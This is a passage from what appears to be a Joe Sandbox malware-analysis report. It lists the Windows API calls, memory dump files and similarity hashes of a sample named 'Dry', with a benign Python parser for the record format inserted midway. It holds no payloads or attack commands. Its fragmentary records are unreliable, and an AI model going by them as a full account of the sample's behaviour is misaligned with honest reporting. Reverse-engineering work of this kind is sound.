                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ebfac5d1b3548637f9fce7e7078796cc06d7be999e1bf9415e12b4d386b9fef
                                                                                                                                                                                                                                                                                    • Instruction ID: 06b88a54e849ad8989d876147411a5cb66bf20fa6538fc9fae095c9b2af3a02a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ebfac5d1b3548637f9fce7e7078796cc06d7be999e1bf9415e12b4d386b9fef
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5041CF70104350AFD720DF29DC85FB67BF8EF49724F140669FAA98B2A1CB709944DB62
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B511B3
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B511EE
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B5120A
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B51283
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B5129A
                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B512C8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e6105f25c0ed2ab8f0159dea72f8cd5fc463116d8213efb52f7796f712d056b6
                                                                                                                                                                                                                                                                                    • Instruction ID: 3645243acca2035da54383aa6be58ebf8524dc914629b33c59699d41db61c80b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6105f25c0ed2ab8f0159dea72f8cd5fc463116d8213efb52f7796f712d056b6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C415671900205ABDF04AF58DC85BAABBB8EF04300F1084E5EE04AB296DB30DE55DBA0
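The per-function records in this part of the report all share one shape: an `APIs` list of `Name.MODULE(args), ref: address` lines (some indented as `Part of subcall function ADDR:`), then `Memory Dump Source`, `Joe Sandbox IDA Plugin` and `Similarity` key/value fields. Across hundreds of functions that is easier to triage as structured data than by scrolling. The parser below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. The sample text it carries is constructed from a few of the lines above, and the helper names (`parse_records`, `calls_by_api`, `find_records_calling`) are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: two function records in the shape the report uses,
# assembled from lines visible on this page. One "Download File" link
# fragment is left fused onto a filename on purpose, since that is how
# the HTML report copies out as plain text.
SAMPLE = """\
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00B511B3
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B511EE
  • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
• CoUninitialize.OLE32 ref: 00B57319
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID: .lnk
• API String ID: 3368777196-0
• Instruction Fuzzy Hash: 9C415671900205ABDF04AF58DC85BAABBB8EF04300F1084E5EE04AB296DB30DE55DBA0
APIs
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B78D2C
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B78D8A
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• Instruction Fuzzy Hash: 2D41DF30642244AFDB26CF24C98DBA17BF1FF45314F1881F9E56D5B2A2CB71A846CB60
"""

# "• Name.MODULE(arg,arg), ref: ADDR" or "• Name.MODULE ref: ADDR" (no
# argument list), optionally prefixed with "Part of subcall function ADDR:".
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Any other "• Key: value" line (Source File, API ID, fuzzy hashes, ...).
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[^:]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str                          # call-site address from "ref:"
    subcall_of: Optional[str] = None  # set when the report marks it as part of a subcall


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    # key -> values; a list because "Associated" repeats within one record
    fields: Dict[str, List[str]] = field(default_factory=dict)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into one FunctionRecord per "APIs" block."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped == "APIs":        # every function record opens with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:               # anything before the first record is ignored
            continue
        m = API_RE.match(line)        # try the API form first: its subcall variant also looks like "Key: value"
        if m:
            raw = m["args"]
            args = tuple(raw.split(",")) if raw else ()
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(), m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            # Drop the "Download File" link text that gets fused onto .sdmp names.
            val = re.sub(r"Download File$", "", m["val"]).strip()
            cur.fields.setdefault(m["key"].strip(), []).append(val)
    return records


def calls_by_api(records: List[FunctionRecord]) -> Dict[str, List[Tuple[int, str]]]:
    """Index: API name -> [(record index, call-site address), ...]."""
    index: Dict[str, List[Tuple[int, str]]] = {}
    for i, rec in enumerate(records):
        for c in rec.calls:
            index.setdefault(c.name, []).append((i, c.ref))
    return index


def find_records_calling(records: List[FunctionRecord], names: Set[str],
                         include_subcalls: bool = False) -> List[int]:
    """Indexes of records whose call list covers every API in `names`."""
    hits = []
    for i, rec in enumerate(records):
        seen = {c.name for c in rec.calls if include_subcalls or c.subcall_of is None}
        if names <= seen:
            hits.append(i)
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, rec in enumerate(recs):
        print(i, rec.fields.get("API ID"), [c.name for c in rec.calls])
    print("ReadFile+InterlockedExchange:", find_records_calling(recs, {"ReadFile", "InterlockedExchange"}))
```

Feed it the whole disassembly section of a report and `calls_by_api` gives one place to look up every call site of, say, `ReadFile` or `mouse_event`, while `find_records_calling` answers "which functions use this combination of APIs", which is what you actually want when deciding which of the hundreds of records deserve a look in the dump.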
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B3FBEF,00000000,?,?,00000000,?,00B239E2,00000004,00000000,00000000), ref: 00B78CA7
• EnableWindow.USER32(?,00000000), ref: 00B78CCD
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B78D2C
• ShowWindow.USER32(?,00000004), ref: 00B78D40
• EnableWindow.USER32(?,00000001), ref: 00B78D66
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B78D8A
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 3a4268ef28c436b223a46f7fbdb299d1b1f4248ac6c8f3312fe0811690381ddc
• Instruction ID: 332ec5972cd591a3dfa069c4bca497e183db3f276f84b23665015b953c222bec
• Opcode Fuzzy Hash: 3a4268ef28c436b223a46f7fbdb299d1b1f4248ac6c8f3312fe0811690381ddc
• Instruction Fuzzy Hash: 2D41DF30642244AFDB26CF24C98DBA17BF1FF45314F1881F9E56D5B2A2CB71A846CB60
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 00B62D45
  • Part of subcall function 00B5EF33: GetWindowRect.USER32(?,?), ref: 00B5EF4B
• GetDesktopWindow.USER32 ref: 00B62D6F
• GetWindowRect.USER32(00000000), ref: 00B62D76
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00B62DB2
• GetCursorPos.USER32(?), ref: 00B62DDE
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B62E3C
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8aeabb7a1823a17ed2da41221fbf133d6effa521abfdb8e4e10ee2b8d36e1b80
                                                                                                                                                                                                                                                                                    • Instruction ID: f5754915ff21b44eeb01f86e3030e8eb49bf84224be69aa35e7872efc63caf32
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aeabb7a1823a17ed2da41221fbf133d6effa521abfdb8e4e10ee2b8d36e1b80
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE31F272605716ABD720DF14C845F9B77E9FFC4354F00092AF89997181DA34EA48CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00B455F9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B45616
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B4564E
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4566C
                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B45674
                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B4567E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 13ddee62895c96d4ff1be6c643088615533849dd0bce649ed99136543493a6e1
                                                                                                                                                                                                                                                                                    • Instruction ID: 61764f7a7372105855bed2b0f3fcd4418cbd949eb9a64f1733a21af2605907d2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13ddee62895c96d4ff1be6c643088615533849dd0bce649ed99136543493a6e1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B212632204A007BEB256B289C49F7B7FECDF45750F1580A9F809DA092EF70CE41A660
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B562C0
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B563DA
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00B80CC4,00000000,00000001,00B80B34,?), ref: 00B563F3
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B56411
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                    • Opcode ID: 07b1ff2511df9534828d3895e9b98e630c476c1d3eac27bb8b9e14161778cbdb
                                                                                                                                                                                                                                                                                    • Instruction ID: ea3e1ea3fc4e38a22eca110bbb0fb5ebed212cb8186dee34d6ba6482d665a25f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07b1ff2511df9534828d3895e9b98e630c476c1d3eac27bb8b9e14161778cbdb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66D14271A082019FC714DF29C584A2ABBF5FF89715F54889CF8899B361DB31EC49CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B78740
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00B78765
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B7877D
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B787A6
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B5C1F2,00000000), ref: 00B787C6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B787B1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bf7ef255e6375acb8282b659d5415f046fd90186ed8e74280a46bcbf905de40e
                                                                                                                                                                                                                                                                                    • Instruction ID: 984403cb2fd480c784d9f8afc48e8905974c281cd6e4bdde0d05985ea49e9439
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf7ef255e6375acb8282b659d5415f046fd90186ed8e74280a46bcbf905de40e
• Instruction Fuzzy Hash: 90217C716512419FCB289F39CC48A6A3BF6EF84365F248669A93BD31E0DE708C50DB20
APIs
• GetLastError.KERNEL32(?,?,00B036E9,00B03355), ref: 00B03700
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B0370E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B03727
• SetLastError.KERNEL32(00000000,?,00B036E9,00B03355), ref: 00B03779
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: a71b39fc16fa8f77b04785ecead54ace1dbd5dc8006bf57c13e92e054c6a4bdd
• Instruction ID: fadc0c57d49ef327e8b9ef96e326eeb39afb602055536a40fbb32ac6730a3ccc
• Instruction Fuzzy Hash: 1B01D4B661E3116EE63527B8ACDE96A2EECEB16FB172003B9F211460F1FF524D425140
APIs
• GetLastError.KERNEL32(?,00000000,00B04D53,00000000,?,?,00B068E2,?,?,00000000), ref: 00B130EB
• _free.LIBCMT ref: 00B1311E
• _free.LIBCMT ref: 00B13146
• SetLastError.KERNEL32(00000000,?,00000000), ref: 00B13153
• SetLastError.KERNEL32(00000000,?,00000000), ref: 00B1315F
• _abort.LIBCMT ref: 00B13165
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: f4a068eaa6f3b364c10d5200e8e406dc2cfe0acfb3e2966f133ded3cc795540f
• Instruction ID: 9a3ed7ce5f4205e333341dea99cf6b0d968aa46a34443771df3b20048843533a
• Instruction Fuzzy Hash: 07F0A47654450076C2122735AC47ADA26EADFC2F70BA104E9F92CF32D1FE608AE24161
APIs
  • Part of subcall function 00AE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AE1F87
  • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1F96
  • Part of subcall function 00AE1F2D: BeginPath.GDI32(?), ref: 00AE1FAD
  • Part of subcall function 00AE1F2D: SelectObject.GDI32(?,00000000), ref: 00AE1FD6
• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B794AA
• LineTo.GDI32(?,00000003,00000000), ref: 00B794BE
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B794CC
• LineTo.GDI32(?,00000000,00000003), ref: 00B794DC
• EndPath.GDI32(?), ref: 00B794EC
• StrokePath.GDI32(?), ref: 00B794FC
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 83bb2c3e2e3af0f93f8de542ec60be87b875a06dc7ecd8f23add9fb77bce12dd
• Instruction ID: a6ac6a97311f1b43cb7f279f3a91e0a2012c381ff3e3c92e913e7bd0dbdd4323
• Instruction Fuzzy Hash: 2E110972000109BFEB129F94DC89E9A7FADEF083A0F04C165FA195A1A1CB719D95DBA0
APIs
• GetDC.USER32(00000000), ref: 00B45B7C
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00B45B8D
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B45B94
• ReleaseDC.USER32(00000000,00000000), ref: 00B45B9C
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B45BB3
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B45BC5
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: c432d9de6063efb31df425a9dddf15bc7724b260f83285cf42fa063c38d30205
• Instruction ID: bd854f137357812e9dc53a2d65504c68d13aae1f747f8390edfd560c5b314a00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c432d9de6063efb31df425a9dddf15bc7724b260f83285cf42fa063c38d30205
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D014F75A00718BBEB11AFA59C49E4EBFB8EF49751F0040A5FA09A7281DA709D00DBA0

APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AE32AF
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00AE32B7
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AE32C2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AE32CD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00AE32D5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE32DD
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 2e6deec630912b9f91a3fa766c1f6763ca43969e78047444dc4707008b10c33d
• Instruction ID: fe99bacd28de09dcda0ea72e1ed604fe23bbc5820bef020c581bb69bdc8643a0
• Opcode Fuzzy Hash: 2e6deec630912b9f91a3fa766c1f6763ca43969e78047444dc4707008b10c33d
